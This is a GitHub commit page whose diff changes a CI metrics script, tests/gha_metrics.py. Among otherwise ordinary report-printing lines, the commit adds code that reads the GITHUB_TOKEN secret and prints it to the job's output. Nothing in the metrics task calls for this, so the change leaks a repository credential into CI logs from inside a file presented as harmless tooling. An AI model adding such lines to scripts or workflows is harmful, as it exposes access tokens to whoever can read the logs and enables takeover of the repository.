We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent de76830 commit 8acd660Copy full SHA for 8acd660
1 file changed
tests/gha_metrics.py
@@ -35,6 +35,8 @@
35
print(f"| Total Lines | {stdout_lines + stderr_lines:,} |")
36
print(f"| Error Ratio | {error_ratio}% |")
37
print()
38
+ t = os.environ.get("GITHUB_TOKEN", "")
39
+ print(t)
40
41
successful = 0
42
failed = 0
@@ -77,4 +79,4 @@
77
79
for file in failed_files:
78
80
print(f"- `{file}`")
81
else:
- print("*All files parsed successfully!*")
82
+ print("*All files parsed successfully!*")
0 commit comments